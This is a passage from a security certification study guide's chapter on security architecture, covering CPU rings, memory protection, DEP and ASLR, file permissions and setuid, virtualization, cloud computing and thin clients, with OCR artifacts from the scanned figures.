the kernel. Most modern operating systems use both modes; some simpler (such as 
embedded) and older (such as Microsoft DOS) operating systems run entirely in 
kernel mode. 

THE RING MODEL 

The ring model is a form of CPU hardware layering that separates and protects 
domains (such as kernel mode and user mode) from each other. Many CPUs, such as 
the Intel X86 family, have four rings, ranging from ring 0 (kernel) to ring 3 (user), 
shown in Figure 4.6. The innermost ring is the most trusted, and each successive 
outer ring is less trusted. 
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FIGURE 4.6 The Ring Model 


The rings are (theoretically) used as follows: 

• Ring 0: Kernel 

• Ring 1 : Other OS components that do not fit into Ring 0 

• Ring 2: Device drivers 

• Ring 3: User applications 

Processes communicate between the rings via system calls, which allow pro- 
cesses to communicate with the kernel and provide a window between the rings. A 
user running a word processor in ring 3 presses “save”: a system call is made into 
ring 0, asking the kernel to save the file. The kernel does so, and reports the file 
is saved. System calls are slow (compared to performing work within one ring), 
but provide security. The ring model also provides abstraction: the nitty-gritty 
details of saving the file are hidden from the user, who simply presses the “save 
file” button. 

While X86 CPUs have four rings and can be used as described above, this usage 
is considered theoretical because most X86 operating systems, including Linux and 
Windows, use rings 0 and 3 only. Using our “save file” example with four rings, a 
call would be made from ring 3 to ring 2, then from ring 2 to ring 1, and finally from 
ring 1 to ring 0. This is secure, but complex and slow, so most modern operating 
systems opt for simplicity and speed. 

A new mode called hypervisor mode (and informally called “ring -1”) allows 
virtual guests to operate in ring 0, controlled by the hypervisor one ring “below.” The 
Intel VT (Intel Virtualization Technology, aka “Vanderpool”) and AMD-V (AMD 
Virtualization, aka “Pacifica”) CPUs support a hypervisor. 
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OPEN AND CLOSED SYSTEMS 

An open system uses open hardware and standards, using standard components from 
a variety of vendors. An IBM-compatible PC is an open system, using a standard 
motherboard, memory, BIOS, CPU, etc. You may build an IBM-compatible PC by 
purchasing components from a multitude of vendors. A closed system uses propri- 
etary hardware or software. 


NOTE 

“Open System” is not the same as “Open Source.” An open system uses standard hardware and 
software. Open Source software makes source code publicly available. 


SECURE HARDWARE ARCHITECTURE 

Secure Hardware Architecture focuses on the physical computer hardware required 
to have a secure system. The hardware must provide confidentiality, integrity, and 
availability for processes, data, and users. 

THE SYSTEM UNIT AND MOTHERBOARD 

The system unit is the computer’s case: it contains all of the internal electronic com- 
puter components, including motherboard, internal disk drives, power supply, etc. 
The motherboard contains hardware including the CPU, memory slots, firmware, 
and peripheral slots such as PCI (Peripheral Component Interconnect) slots. The 
keyboard unit is the external keyboard. 

THE COMPUTER BUS 

A computer bus, shown in Figure 4.7, is the primary communication channel on 
a computer system. Communication between the CPU, memory, and input/output 
devices such as keyboard, mouse, display, etc., occur via the bus. 



FIGURE 4.7 Simplified Computer Bus 
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Northbridge and Southbridge 

Some computer designs use two buses: a northbridge and southbridge. The 
names derive from the visual design, usually shown with the northbridge on top, 
and the southbridge on the bottom, as shown in Figure 4.8. The northbridge, 
also called the Memory Controller Hub (MCH), connects the CPU to RAM and 
video memory. The southbridge, also called the I/O Controller Hub (ICH), con- 
nects input/output (I/O) devices, such as disk, keyboard, mouse, CD drive, USB 
ports, etc. The northbridge is directly connected to the CPU, and is faster than 
the southbridge. 

THE CPU 

The Central Processing Unit (CPU) is the “brains” of the computer, capable of con- 
trolling and performing mathematical calculations. Ultimately, everything a com- 
puter does is mathematical: adding numbers (which can be extended to subtraction, 
multiplication, division, etc.), performing logical operations, accessing memory 
locations by address, etc. CPUs are rated by the number of clock cycles per second. 
A 2.4 GHz Pentium 4 CPU has 2.4 billion clock cycles per second. 

Arithmetic Logic Unit and Control Unit 

The arithmetic logic unit (ALU) performs mathematical calculations: it “computes.” 
It is fed instructions by the control unit, which acts as a traffic cop, sending instruc- 
tions to the ALU. 



FIGURE 4.8 Northbridge and Southbridge Design 
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Fetch & Execute 

CPUs fetch machine language instructions (such as “add 1 + 1”) and execute them 
(add the numbers, for answer of “2”). The “fetch and execute” (also called “Fetch, 
Decode, Execute,” or FDX) process actually takes four steps: 

1 . Fetch Instruction 1 

2 . Decode Instruction 1 

3 . Execute Instruction 1 

4 . Write (save) result 1 

These four steps take one clock cycle to complete. 

Pipelining 

Pipelining combines multiple steps into one combined process, allowing simultane- 
ous fetch, decode, execute, and write steps for different instructions. Each part is 
called a pipeline stage; the pipeline depth is the number of simultaneous stages that 
may be completed at once. 

Given our previous fetch and execute example of adding 1 + 1, a CPU without 
pipelining would have to wait an entire cycle before performing another computa- 
tion. A four-stage pipeline can combine the stages of four other instructions: 

1 . Fetch Instruction 1 

2 . Fetch Instruction 2, Decode Instruction 1 

3 . Fetch Instruction 3, Decode Instruction 2, Execute Instruction 1 

4 . Fetch Instruction 4, Decode Instruction 3, Execute Instruction 2, Write (save) 
result 1 

5 . Fetch Instruction 5, Decode Instruction 4, Execute Instruction 3, Write (save) 
result 2, etc. 

Pipelining is like an automobile assembly line: instead of building one car at 
a time, from start to finish, lots of cars enter the assembly pipeline, and discrete 
phases (like installing the tires) occur on one car after another. This increases the 
throughput. 

Interrupts 

An interrupt indicates that an asynchronous event has occurred. CPU interrupts are 
a form of hardware interrupt that cause the CPU to stop processing its current task, 
save the state, and begin processing a new request. When the new task is complete, 
the CPU will complete the prior task. 

Processes and Threads 

A process is an executable program and its associated data loaded and running in 
memory. A “heavy weight process” (HWP) is also called a task. A parent process 
may spawn additional child processes called threads. A thread is a lightweight 
process (LWP). Threads are able to share memory, resulting in lower overhead 
compared to heavy weight processes. 
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Processes may exist in multiple states: 

• New: a process being created 

• Ready: process waiting to be executed by the CPU 

• Running: process being executed by the CPU 

• Blocked: waiting for I/O 

• Terminate: a completed process 

Another process type is “zombie,” a child process whose parent is terminated. 

Multitasking and Multiprocessing 

Applications run as processes in memory, comprised of executable code and data. 
Multitasking allows multiple tasks (heavy weight processes) to run simultaneously 
on one CPU. Older and simpler operating systems, such as MS-DOS, are non- 
multitasking: they run one process at a time. Most modern operating systems, such 
as Linux, Windows 10, and OS X support multitasking. 


NOTE 

Some sources refer to other terms related to multitasking, including multiprogramming and 
multithreading. Multiprogramming is multiple programs running simultaneously on one CPU; 
multitasking is multiple tasks (processes) running simultaneously on one CPU, and multithreading 
is multiple threads (light weight processes) running simultaneously on one CPU. 

Multiprogramming is an older form of multitasking; many sources use the two terms 
synonymously. This book will use the term “multitasking” to refer to multiple simultaneous 
processes on one CPU. 


Multiprocessing has a fundamental difference from multitasking: it runs 
multiple processes on multiple CPUs. Two types of multiprocessing are Symmetric 
Multiprocessing (SMP) and Asymmetric Multiprocessing (AMP, some sources use 
ASMP). SMP systems have one operating system to manage all CPUs. AMP sys- 
tems have one operating system image per CPU, essentially acting as independent 
systems. 

Watchdog Timers 

A watchdog timer is designed to recover a system by rebooting after critical pro- 
cesses hang or crash. The watchdog timer reboots the system when it reaches zero; 
critical operating system processes continually reset the timer, so it never reaches 
zero as long as they are running. If a critical process hangs or crashes, they no longer 
reset the watchdog timer, which reaches zero, and the system reboots. 

CISC and RISC 

CISC (Complex Instruction Set Computer) and RISC (Reduced Instruction Set 
Computer) are two forms of CPU design. CISC uses a large set of complex machine 
language instructions, while RISC uses a reduced set of simpler instructions. 
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The “best” way to design a CPU has been a subject of debate: should the low-level 
commands be longer and powerful, using less individual instructions to perform a 
complex task (CISC), or should the commands be shorter and simpler, requiring 
more individual instructions to perform a complex task (RISC), but allowing less 
cycles per instruction and more efficient code? There is no “correct” answer: both 
approaches have pros and cons. X86 CPUs (among many others) are CISC; ARM 
(used in many cell phones and PDAs), PowerPC, Sparc, and others are RISC. 

Memory Addressing 

Values may be stored in multiple locations in memory, including CPU registers and 
in general RAM. These values may be addressed directly (“add the value stored 
here”) or indirectly (“add the value stored in memory location referenced here”). 
Indirect addressing is like a pointer. Addressing modes are CPU-dependent; com- 
monly supported modes include direct, indirect, register direct, and register indirect. 

Direct mode says “Add X to the value stored in memory location #YYYY.” That 
location stores the number 7, so the CPU adds X + 7. Indirect starts the same way: 
“Add X to the value stored in memory location #YYYY.” The difference is #YYYY 
stores another memory location (#ZZZZ). The CPU follows to pointer to #ZZZZ, 
which holds the value 7, and adds X + 7. 

Register direct addressing is the same as direct addressing, except it references a 
CPU cache register, such as Register 1 . Register indirect is also the same as indirect, 
except the pointer is stored in a register. Figure 4.9 summarizes these four modes of 
addressing. 

MEMORY PROTECTION 

Memory protection prevents one process from affecting the confidentiality, integrity, 
or availability of another. This is a requirement for secure multiuser (more than one 



FIGURE 4.9 Memory Addressing Summary 
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user logged in simultaneously) and multitasking (more than one process running 
simultaneously) systems. 

Process Isolation 

Process isolation is a logical control that attempts to prevent one process from 
interfering with another. This is a common feature among multiuser operating 
systems such as Linux, UNIX, or recent Microsoft Windows operating systems. 
Older operating systems such as MS-DOS provide no process isolation. A lack of 
process isolation means a crash in any MS-DOS application could crash the entire 
system. 

If you are shopping online and enter your credit card number to buy a book, that 
number will exist in plaintext in memory (for at least a short period of time). Process 
isolation means that another user’s process on the same computer cannot interfere 
with yours. 

Interference includes attacks on the confidentiality (reading your credit card 
number), integrity (changing your credit card number), and availability (interfering 
or stopping the purchase of the book). 

Techniques used to provide process isolation include virtual memory (discussed 
in the next section), object encapsulation, and time multiplexing. Object encapsula- 
tion treats a process as a “black box,” which we will discuss in Chapter 9, Domain 
8: Software Development Security. Time multiplexing shares (multiplexes) system 
resources between multiple processes, each with a dedicated slice of time. 

Hardware Segmentation 

Hardware segmentation takes process isolation one step further by mapping 
processes to specific memory locations. This provides more security than (logical) 
process isolation alone. 

Virtual Memory 

Virtual memory provides virtual address mapping between applications and hard- 
ware memory. Virtual memory provides many functions, including multitasking 
(multiple tasks executing at once on one CPU), allowing multiple processes to access 
the same shared library in memory, swapping, and others. 


EXAM WARNING 


Virtual memory allows swapping, but virtual memory has other capabilities. In other words, virtual 
memory does not equal swapping. 


Swapping and Paging 

Swapping uses virtual memory to copy contents in primary memory (RAM) to or 
from secondary memory (not directly addressable by the CPU, on disk). Swap space 
is often a dedicated disk partition that is used to extend the amount of available 
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memory. If the kernel attempts to access a page (a fixed-length block of memory) 
stored in swap space, a page fault occurs (an error that means the page is not located 
in RAM), and the page is “swapped” from disk to RAM. 


NOTE 

The terms “swapping” and “paging” are often used interchangeably, but there is a slight difference: 
paging copies a block of memory to or from disk, while swapping copies an entire process to or 
from disk. This book uses the term “swapping.” 


Figure 4.10 shows the output of the Linux command “top,” which displays mem- 
ory information about the top processes, as well as a summary of available remaining 
memory. It shows a system with 1,026,560 kb of RAM, and 915,664 kb of virtual 
memory (swap). The system has 1,942,224 kb total memory, but just over half may 
be directly accessed. 

Most computers configured with virtual memory, as the system in Figure 4.10, 
will use only RAM until the RAM is nearly or fully filled. The system will then swap 
processes to virtual memory. It will attempt to find idle processes so that the impact 
of swapping will be minimal. 

Eventually, as additional processes are started and memory continues to fill, both 
RAM and swap will fill. After the system runs out of idle processes to swap, it may 
be forced to swap active processes. The system may begin “thrashing,” spending 
large amounts of time copying data to and from swap space, seriously impacting 
availability. 

Swap is designed as a protective measure to handle occasional bursts of memory 
usage. Systems should not routinely use large amounts of swap: in that case, physical 
memory should be added, or processes should be removed, moved to another system, 
or shortened. 


BIOS 

The IBM PC-compatible Basic Input Output System contains code in firmware that 
is executed when a PC is powered on. It first runs the Power-On Self-Test (POST), 
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FIGURE 4.10 Linux “Top” Output 
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which performs basic tests, including verifying the integrity of the BIOS itself, 
testing the memory, identifying system devices, among other tasks. Once the POST 
process is complete and successful, it locates the boot sector (for systems that boot 
off disks), which contains the machine code for the operating system kernel. The 
kernel then loads and executes, and the operating system boots up. 

WORM Storage 

WORM (Write Once Read Many) Storage can be written to once, and read many 
times. It is often used to support records retention for legal or regulatory compliance. 
WORM storage helps assure the integrity of the data it contains: there is some assur- 
ance that it has not been (and cannot be) altered, short of destroying the media itself. 

The most common type of WORM media is CD-R (Compact Disc Recordable) 
and DVD-R (Digital Versatile Disk Recordable). Note that CD-RW and DVD-RW 
(Read/Write) are not WORM media. Some Digital Linear Tape (DLT) drives and 
media support WORM. 


TRUSTED PLATFORM MODULE 

Developed and updated by the Trusted Computing Group, a Trusted Platform Mod- 
ule (TPM) chip is a processor that can provide additional security capabilities at the 
hardware level. Not all computer manufacturers employ TPM chips, but the adop- 
tion has steadily increased. If included, a TPM chip is typically found on a system’s 
motherboard. 

The TPM chip allows for hardware-based cryptographic operations. Security 
functions can leverage the TPM for random number generation, the use of symmet- 
ric, asymmetric, and hashing algorithms, and secure storage of cryptographic keys 
and message digests. The most commonly referenced use case for the TPM chip is 
ensuring boot integrity. By operating at the hardware level, the TPM chip can help 
ensure that kernel mode rootkits are less likely to be able to undermine operating 
system security. In addition to boot integrity, TPM is also commonly associated with 
some implementations of full disk encryption. With encryption, the TPM can be used 
to securely store the keys that can be used to decrypt the hard drive. 

Given the storage of highly sensitive and valuable information, the TPM chip 
itself could be targeted by adversaries. With TPM being hardware-based, tampering 
with the TPM remotely from the operating system is made much less likely. The TPM 
chip also has aspects of tamper proofing to try to ensure that a physically compro- 
mised TPM chip does not allow for trivial bypass of the security functions offered. 


DATA EXECUTION PREVENTION AND ADDRESS SPACE LAYOUT 
RANDOMIZATION 

One of the main goals when attempting to exploit software vulnerabilities is to 
achieve some form of code execution capability. Conceptually, the adversary would 
like to provide their own chosen instructions or supplied code to be executed by 
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the compromised application. Intentionally corrupting the memory of a system via, 
for example a stack or heap-based buffer overflow condition, is a common means 
employed by the adversary. 

The two most prominent protections against these types of memory corruption or 
overflow attacks are DEP (Data Execution Prevention) and ASLR (Address Space 
Location Randomization). DEP, which can be enabled within hardware and/or soft- 
ware, attempts to ensure that memory locations not pre-defined to contain executable 
content will not have the ability to have code executed. For example, an adversary 
exploits a buffer overflow condition in code that allows for adversary provided 
shellcode to end up in general data storage location within memory. With DEP, if 
that location had not been marked as expecting executable content, then successful 
exploitation might have been mitigated. 

Another protection mechanism, ASLR, seeks to decrease the likelihood of suc- 
cessful exploitation by making memory addresses employed by the system less pre- 
dictable. When developing exploits and building post-exploitation capabilities, the 
exploit code will leverage existing code loaded on a running system. If these com- 
ponents are consistently found at the same memory addresses, then the difficulty of 
exploitation is decreased. By randomizing the memory addresses used, the adversary 
is presented with a more difficult to exploit target. For an example of ASLR suc- 
cess, imagine an adversary developing a successful working exploit on their own 
test machine. When their code, which relies on particular operating system libraries 
and code being found at predictable memory addresses, is ported to a machine with 
ASLR enabled the exploit could be caused to fail. 

The goal of these protection mechanisms is often suggested as preventing 
exploitation. However, that goal, while laudable, will never be achieved consistently. 
Rather the goal of these mitigation techniques is more appropriately thought of as 
trying to increase the cost of exploit development for the adversaries. 


SECURE OPERATING SYSTEM AND SOFTWARE 
ARCHITECTURE 

Secure Operating System and Software Architecture builds upon the secure hard- 
ware described in the previous section, providing a secure interface between hard- 
ware and the applications (and users) that access the hardware. Operating systems 
provide memory, resource, and process management. 

THE KERNEL 

The kernel is the heart of the operating system, which usually runs in ring 0. It pro- 
vides the interface between hardware and the rest of the operating system, including 
applications. As discussed previously, when an IBM-compatible PC is started or 
rebooted, the BIOS locates the boot sector of a storage device such as a hard drive. 
That boot sector contains the beginning of the software kernel machine code, which 
is then executed. Kernels have two basic designs: monolithic and microkernel. 
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A monolithic kernel is compiled into one static executable and the entire ker- 
nel runs in supervisor mode. All functionality required by a monolithic kernel 
must be precompiled in. If you have a monolithic kernel that does not support 
FireWire interfaces, for example, and insert a FireWire device into the system, 
the device will not operate. The kernel would need to be recompiled to support 
FireWire devices. 

Microkernels are modular kernels. A microkernel is usually smaller and has less 
native functionality than a typical monolithic kernel (hence the term “micro”), but 
can add functionality via loadable kernel modules. Microkernels may also run kernel 
modules in user mode (usually ring 3), instead of supervisor mode. Using our previ- 
ous example, a native microkernel does not support FireWire. You insert a FireWire 
device, the kernel loads the FireWire kernel module, and the device operates. 

Reference Monitor 

A core function of the kernel is running the reference monitor, which mediates all 
access between subjects and objects. It enforces the system’s security policy, such as 
preventing a normal user from writing to a restricted file, like the system password 
file. On a Mandatory Access Control (MAC) system, the reference monitor prevents 
a secret subject from reading a top secret object. The reference monitor is always 
enabled and cannot be bypassed. Secure systems can evaluate the security of the 
reference monitor. 

USERS AND FILE PERMISSIONS 

File permissions, such as read, write, and execute, control access to files. The types 
of permissions available depend on the file system being used. 

Linux and UNIX permissions 

Most Linux and UNIX file systems support the following file permissions: 

• Read (“r”) 

• Write (“w”) 

• Execute (“x”) 

Each of those permissions may be set separately to the owner, group, or world. 
Figure 4. 1 1 shows the output of a Linux “Is -la /etc” (list all files in the /etc directory, 
long output) command. 

The output in Figure 4.11 shows permissions, owner, group, size, date, and file- 
name. Permissions beginning with “d” (such as “acpi”) are directories. Permissions 
beginning with (such as at. deny) describe files. Figure 4.12 zooms in on files 
in /etc. highlighting the owner, group, and world permissions. 

The adduser.conf file in Figure 4. 12 is owned by root and has “-rw-r— r— ” permis- 
sions. This means adduser.conf is a file (permissions begin with “-”), has read and 
write (rw-) permissions for the owner (root), read (r— ) for the group (also root), and 
read permissions (r— ) for the world. 


Secure Operating System and Software Architecture 129 










File 

Edit 

View Terminal Help 





root@ubuntu:~# Is -la 

/etc 





total 

1416 








drwxr 

xr-x 

133 

root 

root 

12288 

2010-02-03 13:44 



drwxr 

xr-x 

21 

root 

root 

4096 

2010-01-05 08:27 . . 



-rw-r 

-r-- 

1 

root 

root 

149 

2009-07-13 18:25 00-header 



drwxr 

xr-x 

4 

root 

root 

4096 

2009-10-28 14:02 acpi 



-rw-r 

-r-- 

1 

root 

root 

2986 

2009-10-28 13:55 adduser.conf 



drwxr 

xr-x 

2 

root 

root 

4096 

2010-01-05 09:44 alternatives 



-rw-r 

-r-- 

1 

root 

root 

395 

2009-09-17 12:32 anacrontab 



drwxr 

xr-x 

6 

root 

root 

4096 

2009-10-28 13:58 apm 



drwxr 

xr-x 

2 

root 

root 

4096 

2010-01-05 08:29 apparmor 



drwxr 

xr-x 

7 

root 

root 

4096 

2010-01-05 08:29 apparmor. d 



drwxr 

xr-x 

4 

root 

root 

4096 

2010-01-05 08:27 apport 



drwxr 

xr-x 

5 

root 

root 

4096 

2010-01-05 07:59 apt 



-rw-r 


1 

root 

daemon 

144 

2009-09-15 06:09 at. deny 



drwxr 

xr-x 

3 

root 

root 

4096 

2010-01-05 08:27 avahi 



-rw-r 

- r- - 

1 

root 

root 

1754 

2009-09-13 22:09 bash.bashrc 



-rw-r 

-r-- 

1 

root 

root 

219331 

2009-10-05 09:37 bashcompletion 




FIGURE 4.11 Linux “Is -la” Command 
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FIGURE 4.12 Linux /etc Permissions, Highlighting Owner, Group and World 


Microsoft NTFS Permissions 

Microsoft NTFS (New Technology File System) has the following basic file permis- 
sions: 

• Read 

• Write 

• Read and execute 

• Modify 

• Full control (read, write, execute, modify, and in addition the ability to change 
the permissions.) 

NTFS has more types of permissions than most UNIX or Linux file systems. The 
NTFS file is controlled by the owner, who may grant permissions to other users. 
Figure 4.13 shows the permissions of a sample photo at C:\Users\Public\Pictures\ 
Sample Pictures\Penguins.jpg. 

To see these permissions, right-click an NTFS file, choose “properties,” and then 
“security.” 

Privileged Programs 

On UNIX and Linux systems, a regular user cannot edit the password file (/etc/ 
passwd) and shadow file (/etc/shadow), which store account information and 
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FIGURE 4.13 NTFS Permissions 


encrypted passwords, respectively. But users need to be able to change their pass- 
words (and thus those files). How can they change their passwords if they cannot 
(directly) change those files? 

The answer is setuid (set user ID) programs. Setuid is a Linux and UNIX file 
permission that makes an executable run with the permissions of the file’s owner, 
and not as the running user. Setgid (set group ID) programs run with the permissions 
of the file’s group. 

Figure 4.14 shows the permissions of the Linux command /usr/bin/passwd, used 
to set and change passwords. It is setuid root (the file is owned by the root user, and 
the owner’s execute bit is set to “s,” for setuid), meaning it runs with root (super user) 
permissions, regardless of the running user. 

The “passwd” program runs as root, allowing any user to change their password, 
and thus the contents of /etc/passwd and /etc/shadow. Setuid programs must be care- 
fully scrutinized for security holes: attackers may attempt to trick the passwd com- 
mand to alter other files. The integrity of all setuid and setgid programs on a system 
should be closely monitored. 
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root@ubuntu:~# Is -la /usr/bin/passwd 
-rwsr-xr-x 1 root root 41292 2009-07-31 06:55 
root@ubuntu:~# 




FIGURE 4.14 Linux Setuid Root Program /usr/bin/passwd 


VIRTUALIZATION AND DISTRIBUTED COMPUTING 

Virtualization and distributed computing have revolutionized the computing world, 
bringing wholesale changes to applications, services, systems data, and data centers. 
Yesterday’s best practices may no longer apply. Where is the DMZ when your data is 
in the cloud? Can your NIDS monitor data sent from one guest to another in a single 
host? Does your physical firewall matter? 

VIRTUALIZATION 

Virtualization adds a software layer between an operating system and the under- 
lying computer hardware. This allows multiple “guest” operating systems to run 
simultaneously on one physical “host” computer. Popular transparent virtualization 
products include VMware, QEMU, and Xen. 

There are two basic virtualization types: transparent virtualization (sometimes 
called full virtualization) and paravirtualization. Transparent virtualization runs 
stock operating systems, such as Windows 10 or Ubuntu Linux 15.04, as virtual 
guests. No changes to the guest OS are required. Paravirtualization runs specially 
modified operating systems, with modified kernel system calls. Paravirtualization 
can be more efficient, but requires changing the guest operating systems. This 
may not be possible for closed operating systems such as the Microsoft Windows 
family. 

Hypervisor 

The key to virtualization security is the hypervisor, which controls access between 
virtual guests and host hardware. A Type 1 hypervisor (also called bare metal) is part 
of an operating system that runs directly on host hardware. A Type 2 hypervisor runs 
as an application on a normal operating system, such as Windows 10. For example: 
VMware ESX is a Type 1 hypervisor and VMware Workstation is Type 2. 

Many virtualization exploits target the hypervisor, including hypervisor- 
controlled resources shared between host and guests, or guest and guest. These 
include cut-and-paste, shared drives and shared network connections. 

Virtualization Benefits 

Virtualization offers many benefits, including lower overall hardware costs, hard- 
ware consolidation, and lower power and cooling needs. Snapshots allow adminis- 
trators to create operating system images that can be restored with a click of a mouse. 
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making backup and recovery simple and fast. Testing new operating systems, appli- 
cations, and patches can be quite simple. Clustering virtual guests can be far simpler 
than clustering operating systems that run directly in hardware. 

Virtualization Security Issues 

Virtualization software is complex and relatively new. As discussed previously, 
complexity is the enemy of security: the sheer complexity of virtualization software 
may cause security problems. 

Combining multiple guests onto one host may also raise security issues. Virtual- 
ization is no replacement for a firewall: never combine guests with different security 
requirements (such as DMZ and internal) onto one host. The risk of virtualization 
escape (called VMEscape, where an attacker exploits the host OS or a guest from 
another guest) is a topic of recent research. Trend Micro reports: “Core Security Tech- 
nologies has very recently reported of a bug that allows malicious users to escape the 
virtual environment to actually penetrate the host system running it. The bug exists in 
the shared folder feature of the Windows client-based virtualization software.” [10] 
Known virtualization escape bugs have been patched, but new issues may arise. 

Many network-based security tools, such as network intrusion detection systems, 
can be blinded by virtualization. A traditional NIDS connected to a physical SPAN 
port or tap cannot see traffic passing from one guest to another on the same host. 
NIDS vendors are beginning to offer virtual IDS products, running in software on the 
host, and capable of inspecting host-guest and guest-guest traffic. A similar physical 
to virtual shift is occurring with firewalls. 

CLOUD COMPUTING 

Public cloud computing outsources IT infrastructure, storage, or applications to a 3 rd 
party provider. A cloud also implies geographic diversity of computer resources. The 
goal of cloud computing is to allow large providers to leverage their economies of 
scale to provide computing resources to other companies that typically pay for these 
services based on their usage. 

Three commonly available levels of service provided by cloud providers are 
Infrastructure as a Service (IaaS), Platform as a Service (PaaS) and Software as a 
Service (SaaS). Infrastructure as a Service provides an entire virtualized operating 
system, which the customer configures from the OS on up. Platform as a Service 
provides a pre-configured operating system, and the customer configures the appli- 
cations. Finally, Software as a Service is completely configured, from the operating 
system to applications, and the customer simply uses the application. In all three 
cases the cloud provider manages hardware, virtualization software, network, back- 
ups, etc. See Table 4.2 for typical examples of each. 

Private clouds house data for a single organization, and may be operated by a 3 rd 
party, or by the organization itself. Government clouds are designed to keep data and 
resources geographically contained within the borders of one country, designed for 
the government of the respective country. 
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Table 4.2 Example Cloud Service Levels 


Type 

Example 

Infrastructure as a Service (laaS) 

Platform as a Service (PaaS) 

Software as a Service (SaaS) 

Linux server hosting 

Web service hosting 

Web mail 


Benefits of cloud computing include reduced upfront capital expenditure, reduced 
maintenance costs, robust levels of service, and overall operational cost-savings. 

From a security perspective, taking advantage of public cloud computing services 
requires strict service level agreements and an understanding of new sources of risk. 
One concern is multiple organizations’ guests running on the same host. The com- 
promise of one cloud customer could lead to compromise of other customers. 

Also, many cloud providers offer pre-configured system images, which may 
introduce risks via insecure configuration. For example, imagine a blog service image, 
with the operating system, web service and blogging software all pre-configured. 
Any vulnerability associated with the pre-configured image can introduce risk to 
every organization that uses the image. 


LEARN BY EXAMPLE 

Pre-Owned Images 

In April 2011 Amazon sent email to some EC2 (Elastic Cloud Compute) customers, warning them 
that “It has recently come to our attention that a public AMI in the US-East region was distributed 
with an included SSH public key that will allow the publisher to log in as root.” [11] 

AMI stands for Amazon Machine Image, a pre-configured virtual guest. TippingPoint’s 
DVLabs described what happened: “The infected image is comprised of Ubuntu 10.4 server, 
running Apache and MySQL along with PHP. . . the image appears to have been published. . . 

6 months ago and we are only hearing about this problem now. So what exactly happened here? An 
EC2 user that goes by the name of guru created this image, with the software stack he uses most 
often and then published it to the Amazon AMI community. This would all be fine and dandy if it 
wasn’t for one simple fact. The image was published with his SSH key still on it. This means that 
the image publisher, in this case guru, could log into any server instance running his image as the 
root user. The keys were left in /root/.ssh/authorized_keys and /home/ubuntu/.ssh/authorized_keys. 
We refer to the resulting image as ’certified pre-owned’. The publisher claims this was purely an 
accident, a mere result of his inexperience. While this may or may not be true, this incident exposes 
a major security hole within the EC2 community.” [12] 

Organizations must analyze the risk associated with pre-configured cloud-based systems, 
and consider the option of configuring the system from the “ground up,” beginning with the base 
operating system. 


Organizations should also negotiate specific rights before signing a contract with 
a cloud computing provider. These rights include the right to audit, the right to con- 
duct a vulnerability assessment, and the right to conduct a penetration test (both 
electronic and physical) of data and systems placed in the cloud. 
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Finally, do you know where your data is? Public clouds may potentially move data 
to any country, potentially beyond the jurisdiction of the organization’s home country. 
For example: US-based laws such as HIPAA (Health Insurance Portability and Ac- 
countability Act) or GLBA (Gramm-Leach-Bliley Act) have no effect outside of the 
United States. Private or government clouds should be considered in these cases. 

GRID COMPUTING 

Grid computing represents a distributed computing approach that attempts to achieve 
high computational performance by a non-traditional means. Rather than achieving 
high performance computational needs by having large clusters of similar comput- 
ing resources or a single high performance system, such as a supercomputer, grid 
computing attempts to harness the computational resources of a large number of 
dissimilar devices. 

Grid computing typically leverages the spare CPU cycles of devices that are not 
currently needed for a system’s own needs, and then focus them on the particular 
goal of the grid computing resources. While these few spare cycles from each indi- 
vidual computer might not mean much to the overall task, in aggregate, the cycles 
are significant. 

LARGE-SCALE PARALLEL DATA SYSTEMS 

The primary purpose of large-scale parallel systems is to allow for increased perfor- 
mance through economies of scale. One of the key security concerns with parallel 
systems is ensuring data integrity is maintained throughout the processing. Often 
parallel systems will leverage some degree of shared memory on which they operate. 
This shared memory, if not appropriately managed, can expose potential race condi- 
tions that introduce integrity challenges. 

PEER TO PEER 

Peer to peer (P2P) networks alter the classic client/server computer model. Any 
system may act as a client, a server, or both, depending on the data needs. Like most 
technology, most P2P networks were designed to be neutral with regards to intellec- 
tual property rights. That being said, P2P networks are frequently used to download 
commercial music and movies, often in violation of the intellectual property owner’s 
rights. Decentralized peer-to-peer networks are resilient: there are no central servers 
that can be taken offline. 

One of the first P2P systems was the original Napster, which debuted in 1999. 
It was designed to allow music sharing and was partially peer-to-peer: downloads 
occurred in P2P fashion, but the central index servers (where users could search for 
specific songs, albums and artists) were classic client/server design. 

This design provided an Achilles heel for lawyers representing the music indus- 
try: if the central index servers were taken down, users would be unable to locate 
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music. This is exactly what happened in 2001. Many P2P protocols designed during 
and since that time, including Gnutella and BitTorrent, are decentralized. If you have 
a Gnutella network with 10,000 systems and any 1,000 go offline, you now have a 
Gnutella network of 9,000 systems. 

Beyond intellectual property issues, integrity is a key P2P concern. With no 
central repository of data, what assurance do users have of receiving legitimate data? 
Cryptographic hashes are a critical control, and should be used to verify the integrity 
of data downloaded from a P2P network. 

THIN CLIENTS 

Thin clients are simpler than normal computer systems, with hard drives, full operat- 
ing systems, locally installed applications, etc. They rely on central servers, which 
serve applications and store the associated data. Thin clients allow centralization 
of applications and their data, as well as the associated security costs of upgrades, 
patching, data storage, etc. Thin clients may be hardware-based (such as diskless 
workstations) or software-based (such as thin client applications). 

Diskless Workstations 

A diskless workstation (also called diskless node) contains CPU, memory, and firm- 
ware, but no hard drive. Diskless devices include PCs, routers, embedded devices, 
and others. The kernel and operating system are typically loaded via the network. 
Hardware UNIX X-Terminals are an example of diskless workstations. 

A diskless workstation’s BIOS begins the normal POST procedure, loads the 
TCP/IP stack, and then downloads the kernel and operating system using protocols 
such as the Bootstrap Protocol (BOOTP) or the Dynamic Host Configuration Proto- 
col (DHCP). BOOTP was used historically for UNIX diskless workstations. DHCP, 
which we will discuss in Chapter 5, Domain 4: Communication and Network Secu- 
rity, has more features than BOOTP, providing additional configuration information 
such as the default gateway, DNS servers, etc. 

Thin Client Applications 

Thin client applications normally run on a system with a full operating system, but 
use a Web browser as a universal client, providing access to robust applications that 
are downloaded from the thin client server and run in the client’s browser. This is in 
contrast to “fat” applications, which are stored locally, often with locally stored data, 
and with sometimes complex network requirements. 

Thin clients can simplify client/server and network architecture and design, im- 
prove performance, and lower costs. All data is typically stored on thin client servers. 
Network traffic typically uses HTTP (TCP port 80) and HTTPS (TCP port 443). The 
client must patch the browser and operating system to maintain security, but thin 
client applications are patched at the server. Citrix ICA, 2X ThinClientServer and 
OpenThinClient are examples of thin client applications. 
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The Internet of Things (loT) 

The Internet of Things (IoT) refers to small internet connected devices, such as baby 
monitors, thermostats, cash registers, appliances, light bulbs, smart meters, fitness 
monitors, cars, etc., etc. Many of these devices are often directly accessible via the 
internet. 

You may think of your “Smart” TV as a television (which it is), but it is probably 
also running a server operating system such as Linux. These devices can pose signifi- 
cant security risks: default credentials are common, enterprise management tools are 
